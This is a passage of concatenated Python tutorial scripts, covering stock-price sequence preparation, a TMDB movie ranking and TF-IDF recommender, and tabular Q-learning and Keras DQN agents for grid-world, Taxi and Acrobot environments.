        already-loaded pd.DataFrame.
    :param n_steps: length of each training sequence.
    :param scale: min-max scale each feature column into [0, 1].
    :param split: when True return train/test splits, otherwise whole X/y.
    :param balance: with buy_sell, balance buy vs sell samples.
    :param shuffle: shuffle sequences (an unshuffled copy of the test split
        is kept for evaluation).
    :param lookup_step: how many rows ahead the target price is taken from.
    :param test_size: test-set ratio in [0, 1].
    :param price_column: column the target is derived from.
    :param feature_columns: feature column names; defaults to ['Price'].
        (Was a mutable default argument — replaced with a None sentinel.)
    :param target_column: name of the generated target column.
    :param buy_sell: convert the regression target to 0/1 classes.
    :return: dict with the dataframe, scalers, last_sequence and splits.
    :raises TypeError: when ticker is neither a str nor a DataFrame.
    """
    # avoid the shared mutable default argument
    if feature_columns is None:
        feature_columns = ['Price']
    if isinstance(ticker, str):
        df = si.get_data(ticker)
    elif isinstance(ticker, pd.DataFrame):
        df = ticker
    else:
        raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
    result = {}
    # keep an unscaled copy of the raw data for callers
    result['df'] = df.copy()
    # make sure that columns passed is in the dataframe
    for col in feature_columns:
        assert col in df.columns, f"'{col}' is not a column of the dataframe"
    column_scaler = {}
    if scale:
        # scale the data ( from 0 to 1 ), remembering each scaler for inverse transforms
        for column in feature_columns:
            scaler = preprocessing.MinMaxScaler()
            df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
            column_scaler[column] = scaler
    # add column scaler to the result
    result['column_scaler'] = column_scaler
    # add future price column ( price lookup_step rows ahead )
    df[target_column] = df[price_column].shift(-lookup_step)
    # get last feature elements ( to add them to the last sequence )
    # before deleted by df.dropna
    last_feature_element = np.array(df[feature_columns].tail(1))
    # clean NaN entries
    df.dropna(inplace=True)
    if buy_sell:
        # convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
        df[target_column] = list(map(classify, df[price_column], df[target_column]))
    seq_data = []  # all sequences here
    # sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
    sequences = deque(maxlen=n_steps)
    for entry, target in zip(df[feature_columns].values, df[target_column].values):
        sequences.append(entry)
        if len(sequences) == n_steps:
            seq_data.append([np.array(sequences), target])
    # get the last sequence for future predictions
    last_sequence = np.array(sequences)
    # shift the sequence, one element is missing ( deleted by dropna )
    last_sequence = shift(last_sequence, -1)
    # fill the last element
    last_sequence[-1] = last_feature_element
    # add last sequence to results
    result['last_sequence'] = last_sequence
    if buy_sell and balance:
        buys, sells = [], []
        for seq, target in seq_data:
            if target == 0:
                sells.append([seq, target])
            else:
                buys.append([seq, target])
        # balancing the dataset: keep equally many of each class
        lower_length = min(len(buys), len(sells))
        buys = buys[:lower_length]
        sells = sells[:lower_length]
        seq_data = buys + sells
    if shuffle:
        # keep a time-ordered copy before shuffling for later evaluation
        unshuffled_seq_data = seq_data.copy()
        random.shuffle(seq_data)
    X, y = [], []
    for seq, target in seq_data:
        X.append(seq)
        y.append(target)
    X = np.array(X)
    y = np.array(y)
    if shuffle:
        unshuffled_X, unshuffled_y = [], []
        for seq, target in unshuffled_seq_data:
            unshuffled_X.append(seq)
            unshuffled_y.append(target)
        unshuffled_X = np.array(unshuffled_X)
        unshuffled_y = np.array(unshuffled_y)
        # NOTE(review): reshape reorders elements rather than transposing axes;
        # train and inference both apply it, so they stay mutually consistent,
        # but confirm a transpose wasn't intended here.
        unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
    X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
    if not split:
        # return everything unsplit
        result['X'] = X
        result['y'] = y
        return result
    else:
        # split dataset into training and testing (chronological split)
        n_samples = X.shape[0]
        train_samples = int(n_samples * (1 - test_size))
        result['X_train'] = X[:train_samples]
        result['X_test'] = X[train_samples:]
        result['y_train'] = y[:train_samples]
        result['y_test'] = y[train_samples:]
        if shuffle:
            result['unshuffled_X_test'] = unshuffled_X[train_samples:]
            result['unshuffled_y_test'] = unshuffled_y[train_samples:]
        return result
# from sentdex
def classify(current, future):
    """Return 1 (buy) when the future price exceeds the current one, else 0 (sell)."""
    return 1 if float(future) > float(current) else 0
def shift(arr, num, fill_value=np.nan):
    """Shift *arr* by *num* positions along axis 0.

    Positive *num* shifts towards higher indices, negative towards lower;
    vacated slots are filled with *fill_value*.  A zero shift returns the
    input array unchanged (same object).
    """
    if num == 0:
        return arr
    shifted = np.empty_like(arr)
    if num > 0:
        # forward shift: pad the front, copy the prefix to the back
        shifted[:num] = fill_value
        shifted[num:] = arr[:-num]
    else:
        # backward shift: pad the tail, copy the suffix to the front
        shifted[num:] = fill_value
        shifted[:num] = arr[-num:]
    return shifted
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
# Paths to the TMDB 5000 dataset CSVs (local disk).
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
# IMDB-style weighted rating: WR = v/(v+m)*R + m/(v+m)*C — blends each movie's
# average with the global mean, weighting by its vote count
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
# same chart for raw popularity instead of weighted rating
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
# TF-IDF over the plot overviews: unigrams to trigrams, rare terms dropped
tfv = TfidfVectorizer(min_df=3, max_features=None,
                      strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
                      ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
                      stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
# --- environment / training configuration ---
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for differents events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
# NOTE(review): epsilon = 0 means the agent never explores — presumably this
# run expects a pretrained q-table; confirm before training from scratch.
epsilon = 0 # for randomness, it'll decay over time by EPSILON_DECAY
EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
# cell codes used to color the rendered grid
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors (BGR as used by cv2)
COLORS = {
    PLAYER_CODE: (255, 120, 0), # blueish color
    FOOD_CODE: (0, 255, 0), # green
    ENEMY_CODE: (0, 0, 255), # red
}
# action code -> (dx, dy) step applied to the player each turn
ACTIONS = {
    0: (0, 1),
    1: (-1, 0),
    2: (0, -1),
    3: (1, 0)
}
# number of enemy blobs in the environment
N_ENEMIES = 2
def get_observation(cords):
    """Flatten (dx, dy) coordinate pairs into one tuple of non-negative ints.

    Each component is offset by GRID_SIZE - 1 so the result can index the
    q-table directly (deltas range over [-GRID_SIZE+1, GRID_SIZE-1]).
    """
    return tuple(component + GRID_SIZE - 1 for pair in cords for component in pair)
class Blob:
    """One square on the grid — the player, the food, or an enemy."""

    def __init__(self, name=None):
        # spawn at a uniformly random cell of the grid
        self.x = np.random.randint(0, GRID_SIZE)
        self.y = np.random.randint(0, GRID_SIZE)
        self.name = name or "Blob"

    def __sub__(self, other):
        """Relative (dx, dy) position of this blob with respect to *other*."""
        return (self.x - other.x, self.y - other.y)

    def __str__(self):
        return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"

    def move(self, x=None, y=None):
        """Step by (x, y); a None component moves randomly in {-1, 0, 1}."""
        self.x += np.random.randint(-1, 2) if x is None else x
        self.y += np.random.randint(-1, 2) if y is None else y
        # keep the blob inside the grid bounds
        self.x = min(max(self.x, 0), GRID_SIZE - 1)
        self.y = min(max(self.y, 0), GRID_SIZE - 1)

    def take_action(self, choice):
        """Translate an action code into a move using the ACTIONS table."""
        delta = ACTIONS.get(choice)
        if delta is not None:
            self.move(x=delta[0], y=delta[1])
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
    # q_table = {}
    # # for every possible combination of the distance of the player
    # # to both the food and the enemy
    # for i in range(-GRID_SIZE+1, GRID_SIZE):
    #     for ii in range(-GRID_SIZE+1, GRID_SIZE):
    #         for iii in range(-GRID_SIZE+1, GRID_SIZE):
    #             for iiii in range(-GRID_SIZE+1, GRID_SIZE):
    #                 q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
    # one axis per observation component (player-food and per-enemy deltas,
    # each taking GRID_SIZE*2-1 values) plus a final axis over the actions,
    # initialised with small negative random values
    q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
    # the q table already exists
    print("Loading Q-table")
    q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
    # initialize our blobs ( squares ) at fresh random positions
    player = Blob("Player")
    food = Blob("Food")
    enemy1 = Blob("Enemy1")
    enemy2 = Blob("Enemy2")
    if episode % SHOW_EVERY == 0:
        print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
        show = True
    else:
        show = False
    episode_reward = 0
    for i in range(STEPS):
        # get the observation (deltas to food and both enemies)
        obs = get_observation((player - food, player - enemy1, player - enemy2))
        # Epsilon-greedy policy
        if np.random.random() > epsilon:
            # get the action from the q table
            action = np.argmax(q_table[obs])
        else:
            # random action
            action = np.random.randint(0, len(ACTIONS))
        # take the action
        player.take_action(action)
        #### MAYBE ###
        #enemy.move()
        #food.move()
        ##############
        # food and enemies wander randomly each step
        food.move()
        enemy1.move()
        enemy2.move()
        ### for rewarding
        if player.x == enemy1.x and player.y == enemy1.y:
            # if it hit the enemy, punish
            reward = ENEMY_REWARD
        elif player.x == enemy2.x and player.y == enemy2.y:
            # if it hit the enemy, punish
            reward = ENEMY_REWARD
        elif player.x == food.x and player.y == food.y:
            # if it hit the food, reward
            reward = FOOD_REWARD
        else:
            # else, punish it a little for moving
            reward = MOVE_REWARD
        ### calculate the Q
        # get the future observation after taking action
        future_obs = get_observation((player - food, player - enemy1, player - enemy2))
        # get the max future Q value (SarsaMax algorithm)
        # SARSA = State0, Action0, Reward0, State1, Action1
        max_future_q = np.max(q_table[future_obs])
        # get the current Q
        current_q = q_table[obs][action]
        # calculate the new Q
        if reward == FOOD_REWARD:
            # terminal success state: pin the Q value to the food reward
            new_q = FOOD_REWARD
        else:
            # value iteration update
            # https://en.wikipedia.org/wiki/Q-learning
            # Calculate the Temporal-Difference target
            td_target = reward + DISCOUNT * max_future_q
            # Temporal-Difference
            new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
        # update the q
        q_table[obs][action] = new_q
        if show:
            # render the grid as a small RGB image via OpenCV
            env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
            # set food blob to green
            env[food.x][food.y] = COLORS[FOOD_CODE]
            # set the enemy blob to red
            env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
            env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
            # set the player blob to blueish
            env[player.x][player.y] = COLORS[PLAYER_CODE]
            # get the image
            image = Image.fromarray(env, 'RGB')
            image = image.resize((600, 600))
            # show the image
            cv2.imshow("image", np.array(image))
            # pause longer on terminal frames; 'q' quits the episode render
            if reward == FOOD_REWARD or reward == ENEMY_REWARD:
                if cv2.waitKey(500) == ord('q'):
                    break
            else:
                if cv2.waitKey(100) == ord('q'):
                    break
        episode_reward += reward
        # episode ends when the player reaches food or an enemy
        if reward == FOOD_REWARD or reward == ENEMY_REWARD:
            break
    episode_rewards.append(episode_reward)
    # decay a little randomness in each episode
    epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
#     pickle.dump(q_table, f)
# persist the learned table for future runs
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
# plot the moving average of the per-episode rewards
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
# Tabular Q-learning on the classic Gym Taxi environment.
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
    # reset the env
    state = env.reset()
    epochs, penalties, rewards = 0, 0, []
    done = False
    while not done:
        # epsilon-greedy action selection
        if random.random() < EPSILON:
            # exploration
            action = env.action_space.sample()
        else:
            # exploitation
            action = np.argmax(q_table[state])
        next_state, reward, done, info = env.step(action)
        old_q = q_table[state, action]
        future_q = np.max(q_table[next_state])
        # calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
        new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
        # update the new Q
        q_table[state, action] = new_q
        # Taxi gives -10 for illegal pickup/dropoff actions
        if reward == -10:
            penalties += 1
        state = next_state
        epochs += 1
        rewards.append(reward)
    if i % SHOW_EVERY == 0:
        # NOTE(review): on the very first episode all_rewards is empty, so
        # np.average returns nan (with a warning) — harmless but noisy.
        print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
        # env.render()
    all_epochs.append(epochs)
    all_penalties.append(penalties)
    all_rewards.append(np.average(rewards))
    # decay exploration after every episode
    EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
# clear the console (Windows vs POSIX)
os.system("cls") if "nt" in os.name else os.system("clear")
# render one greedy rollout with the learned table
state = env.reset()
done = False
while not done:
    action = np.argmax(q_table[state])
    state, reward, done, info = env.step(action)
    env.render()
    time.sleep(0.2)
    os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
# --- DQN training configuration ---
EPISODES = 5_000
# max transitions kept in the replay buffer
REPLAY_MEMORY_MAX = 20_000
# do not train until at least this many transitions are collected
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
# side length of the square grid world
GRID_SIZE = 20
# number of discrete movement actions (8 directions + stand still)
ACTION_SIZE = 9
class Blob:
    """A square living on a size x size grid (player, food or enemy)."""

    def __init__(self, size):
        # grid side length; positions are clamped into [0, size-1]
        self.size = size
        self.x = np.random.randint(0, size)
        self.y = np.random.randint(0, size)

    def __str__(self):
        return f"Blob ({self.x}, {self.y})"

    def __sub__(self, other):
        # relative (dx, dy) offset to another blob
        return (self.x-other.x, self.y-other.y)

    def __eq__(self, other):
        # blobs are equal when they occupy the same cell
        return self.x == other.x and self.y == other.y

    def action(self, choice):
        '''
        Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
        '''
        # map each action code to a (dx, dy) step; 8 is "stand still"
        deltas = {0: (1, 1), 1: (-1, -1), 2: (-1, 1), 3: (1, -1),
                  4: (1, 0), 5: (-1, 0), 6: (0, 1), 7: (0, -1), 8: (0, 0)}
        dx, dy = deltas[choice]
        self.move(x=dx, y=dy)

    def move(self, x=None, y=None):
        """Step by (x, y); a None component moves randomly in {-1, 0, 1}.

        Bug fix: the original signature used False defaults with `if not x:`,
        which treated an explicit 0 step as "move randomly" — so action 8
        (stand still) and every axis-aligned move randomised the zero axis.
        A None sentinel preserves the "no argument => random" behavior while
        honouring explicit zero steps.
        """
        if x is None:
            self.x += np.random.randint(-1, 2)
        else:
            self.x += x
        if y is None:
            self.y += np.random.randint(-1, 2)
        else:
            self.y += y
        # If we are out of bounds, fix!
        if self.x < 0:
            self.x = 0
        elif self.x > self.size-1:
            self.x = self.size-1
        if self.y < 0:
            self.y = 0
        elif self.y > self.size-1:
            self.y = self.size-1
class BlobEnv:
    """Gym-like grid world: a player chases food while avoiding an enemy."""
    # when True, observations are RGB grid images; otherwise coordinate deltas
    RETURN_IMAGES = True
    MOVE_PENALTY = 1
    ENEMY_PENALTY = 300
    FOOD_REWARD = 25
    ACTION_SPACE_SIZE = 9
    PLAYER_N = 1  # player key in dict
    FOOD_N = 2  # food key in dict
    ENEMY_N = 3  # enemy key in dict
    # the dict! (colors)
    d = {1: (255, 175, 0),
         2: (0, 255, 0),
         3: (0, 0, 255)}
    def __init__(self, size):
        # grid side length; image observations are SIZE x SIZE x 3
        self.SIZE = size
        self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3)  # 4
    def reset(self):
        """Start a new episode: spawn blobs on distinct cells, return the first observation."""
        self.player = Blob(self.SIZE)
        self.food = Blob(self.SIZE)
        # re-roll until food does not overlap the player
        while self.food == self.player:
            self.food = Blob(self.SIZE)
        self.enemy = Blob(self.SIZE)
        # re-roll until the enemy overlaps neither player nor food
        while self.enemy == self.player or self.enemy == self.food:
            self.enemy = Blob(self.SIZE)
        self.episode_step = 0
        if self.RETURN_IMAGES:
            observation = np.array(self.get_image())
        else:
            observation = (self.player-self.food) + (self.player-self.enemy)
        return observation
    def step(self, action):
        """Apply *action* to the player; return (observation, reward, done).

        The episode ends on reaching the food (+FOOD_REWARD), hitting the
        enemy (-ENEMY_PENALTY), or after 200 steps; otherwise each step
        costs MOVE_PENALTY.
        """
        self.episode_step += 1
        self.player.action(action)
        #### MAYBE ###
        #enemy.move()
        #food.move()
        ##############
        if self.RETURN_IMAGES:
            new_observation = np.array(self.get_image())
        else:
            new_observation = (self.player-self.food) + (self.player-self.enemy)
        if self.player == self.enemy:
            reward = -self.ENEMY_PENALTY
            done = True
        elif self.player == self.food:
            reward = self.FOOD_REWARD
            done = True
        else:
            reward = -self.MOVE_PENALTY
            if self.episode_step < 200:
                done = False
            else:
                done = True
        return new_observation, reward, done
    def render(self):
        """Show the current grid in an OpenCV window."""
        img = self.get_image()
        img = img.resize((300, 300))  # resizing so we can see our agent in all its glory.
        cv2.imshow("image", np.array(img))  # show it!
        cv2.waitKey(1)
    # FOR CNN #
    def get_image(self):
        """Return the current grid as a PIL RGB image (one colored pixel per blob)."""
        env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8)  # starts an rbg of our size
        env[self.food.x][self.food.y] = self.d[self.FOOD_N]  # sets the food location tile to green color
        env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N]  # sets the enemy location to red
        env[self.player.x][self.player.y] = self.d[self.PLAYER_N]  # sets the player tile to blue
        img = Image.fromarray(env, 'RGB')  # reading to rgb. Apparently. Even tho color definitions are bgr. ???
        return img
class DQNAgent:
    """DQN agent with separate online and target networks for image states.

    Pixel observations are scaled by 1/255 and given a leading batch
    dimension before every predict/remember call.
    """
    def __init__(self, state_size, action_size):
        self.state_size = state_size
        self.action_size = action_size
        self.memory = deque(maxlen=REPLAY_MEMORY_MAX)  # experience replay buffer
        # discount rate
        self.gamma = 0.95
        # exploration rate
        self.epsilon = 1.0
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.9997
        self.learning_rate = 0.001
        # models to be built
        # Dual
        self.model = self.build_model()
        self.target_model = self.build_model()
        self.update_target_model()
    def build_model(self):
        """Builds the DQN Model"""
        # Neural network for Deep-Q Learning Model
        model = Sequential()
        model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
        model.add(Activation("relu"))
        model.add(MaxPooling2D(pool_size=(2, 2)))
        model.add(Dropout(0.2))
        model.add(Conv2D(256, (3, 3)))
        model.add(Activation("relu"))
        model.add(MaxPooling2D(pool_size=(2, 2)))
        model.add(Dropout(0.2))
        model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
        model.add(Dense(32))
        # output layer
        model.add(Dense(self.action_size, activation="linear"))
        model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
        return model
    def update_target_model(self):
        """Copy weights from self.model to self.target_model"""
        self.target_model.set_weights(self.model.get_weights())
    def remember(self, state, action, reward, next_state, done):
        """Adds a sample to the memory"""
        # for images, expand dimension, comment if you are not using images as states
        state = state / 255
        next_state = next_state / 255
        state = np.expand_dims(state, axis=0)
        next_state = np.expand_dims(next_state, axis=0)
        self.memory.append((state, action, reward, next_state, done))
    def act(self, state):
        """Takes action using Epsilon-Greedy Policy"""
        if np.random.random() <= self.epsilon:
            return random.randint(0, self.action_size-1)
        else:
            # state arrives raw here: normalize and add a batch dim before predicting
            state = state / 255
            state = np.expand_dims(state, axis=0)
            act_values = self.model.predict(state)
            # print("act_values:", act_values.shape)
            return np.argmax(act_values[0])
    def replay(self, batch_size):
        """Train on a replay memory with a batch_size of samples"""
        if len(self.memory) < MIN_REPLAY_MEMORY:
            return
        minibatch = random.sample(self.memory, batch_size)
        for state, action, reward, next_state, done in minibatch:
            target = reward
            if not done:
                # bootstrap from the target network (standard DQN update)
                target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
            target_f = self.model.predict(state)
            target_f[0][action] = target
            self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
        # decay epsilon if possible
        self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
    def load(self, name):
        """Load weights into both the online and target networks."""
        self.model.load_weights(name)
        self.target_model.load_weights(name)
    def save(self, name):
        """Save the network weights to *name*."""
        self.model.save_weights(name)
        self.target_model.save_weights(name)
if __name__ == "__main__":
    # NOTE(review): GRID_SIZE, ACTION_SIZE, LEARN_EVERY, RENDER_EVERY and
    # MIN_REPLAY_MEMORY are defined earlier in this file (outside this excerpt).
    batch_size = 64
    env = BlobEnv(GRID_SIZE)
    agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
    # seed the rolling stats window with a pessimistic reward
    ep_rewards = deque([-200], maxlen=SHOW_EVERY)
    avg_rewards = []
    min_rewards = []
    max_rewards = []
    for episode in range(1, EPISODES+1):
        # restarting episode => reset episode reward and step number
        episode_reward = 0
        step = 1
        # reset env and get init state
        current_state = env.reset()
        done = False
        while True:
            # take action
            action = agent.act(current_state)
            next_state, reward, done = env.step(action)
            episode_reward += reward
            if episode % RENDER_EVERY == 0:
                env.render()
            # add transition to agent's memory
            agent.remember(current_state, action, reward, next_state, done)
            if step % LEARN_EVERY == 0:
                agent.replay(batch_size=batch_size)
            current_state = next_state
            step += 1
            if done:
                # sync the target network at the end of each episode
                agent.update_target_model()
                break
        # rolling statistics over the last SHOW_EVERY episodes
        ep_rewards.append(episode_reward)
        avg_reward = np.mean(ep_rewards)
        min_reward = min(ep_rewards)
        max_reward = max(ep_rewards)
        avg_rewards.append(avg_reward)
        min_rewards.append(min_reward)
        max_rewards.append(max_reward)
        print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
        # if episode % SHOW_EVERY == 0:
        #     print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
    # plot avg (blue), min (red), max (green) reward curves
    episodes = list(range(EPISODES))
    plt.plot(episodes, avg_rewards, c='b')
    plt.plot(episodes, min_rewards, c='r')
    plt.plot(episodes, max_rewards, c='g')
    plt.show()
    agent.save("blob_v1.h5")
import os
# force CPU execution: hide all CUDA devices from TensorFlow
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"  # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# NOTE(review): `config` is built but never passed to a tf.Session in this
# excerpt — confirm a Session(config=config) exists elsewhere, otherwise
# these thread limits have no effect.
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                         'GPU' : 0}
                        )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
# hyperparameters for the Acrobot training run below
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
    """DQN agent with online + target dense networks for low-dimensional
    vector observations; states are expected pre-shaped to (1, state_size)."""
    def __init__(self, state_size, action_size):
        self.state_size = state_size
        self.action_size = action_size
        self.memory = deque(maxlen=REPLAY_MEMORY_MAX)  # experience replay buffer
        # discount rate
        self.gamma = 0.95
        # exploration rate
        self.epsilon = 1.0
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.9997
        self.learning_rate = 0.001
        # models to be built
        # Dual
        self.model = self.build_model()
        self.target_model = self.build_model()
        self.update_target_model()
    def build_model(self):
        """Builds the DQN Model"""
        # Neural network for Deep-Q Learning Model
        model = Sequential()
        model.add(Dense(32, input_dim=self.state_size, activation="relu"))
        model.add(Dense(32, activation="relu"))
        # output layer
        model.add(Dense(self.action_size, activation="linear"))
        model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
        return model
    def update_target_model(self):
        """Copy weights from self.model to self.target_model"""
        self.target_model.set_weights(self.model.get_weights())
    def remember(self, state, action, reward, next_state, done):
        """Adds a sample to the memory"""
        self.memory.append((state, action, reward, next_state, done))
    def act(self, state):
        """Takes action using Epsilon-Greedy Policy"""
        if np.random.random() <= self.epsilon:
            return random.randint(0, self.action_size-1)
        else:
            act_values = self.model.predict(state)
            # print("act_values:", act_values.shape)
            return np.argmax(act_values[0])
    def replay(self, batch_size):
        """Train on a replay memory with a batch_size of samples"""
        # NOTE(review): no minimum-memory guard here; the caller must ensure
        # len(self.memory) >= batch_size before calling.
        minibatch = random.sample(self.memory, batch_size)
        for state, action, reward, next_state, done in minibatch:
            target = reward
            if not done:
                # bootstrap from the target network (standard DQN update)
                target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
            target_f = self.model.predict(state)
            target_f[0][action] = target
            self.model.fit(state, target_f, epochs=1, verbose=0)
        # decay epsilon if possible
        self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
    def load(self, name):
        """Load weights into both networks."""
        self.model.load_weights(name)
        self.target_model.load_weights(name)
    def save(self, name):
        """Save the network weights to *name*."""
        self.model.save_weights(name)
        self.target_model.save_weights(name)
if __name__ == "__main__":
    env = gym.make("Acrobot-v1")
    state_size = env.observation_space.shape[0]
    action_size = env.action_space.n
    agent = DQNAgent(state_size=state_size, action_size=action_size)
    # agent.load("AcroBot_v1.h5")
    done = False
    batch_size = 32
    all_rewards = deque(maxlen=SHOW_EVERY)  # rolling reward window for stats
    avg_rewards = []
    for e in range(EPISODES):
        state = env.reset()
        state = np.reshape(state, (1, state_size))
        rewards = 0
        while True:
            action = agent.act(state)
            # print(action)
            next_state, reward, done, info = env.step(action)
            # punish if not yet finished
            # reward = reward if not done else 10
            next_state = np.reshape(next_state, (1, state_size))
            agent.remember(state, action, reward, next_state, done)
            state = next_state
            if done:
                agent.update_target_model()
                break
            if e % RENDER_EVERY == 0:
                env.render()
            # NOTE(review): the terminal step's reward is never added to
            # `rewards` because the loop breaks above before this line —
            # confirm that is intended.
            rewards += reward
        # print(rewards)
        all_rewards.append(rewards)
        avg_reward = np.mean(all_rewards)
        avg_rewards.append(avg_reward)
        if e % SHOW_EVERY == 0:
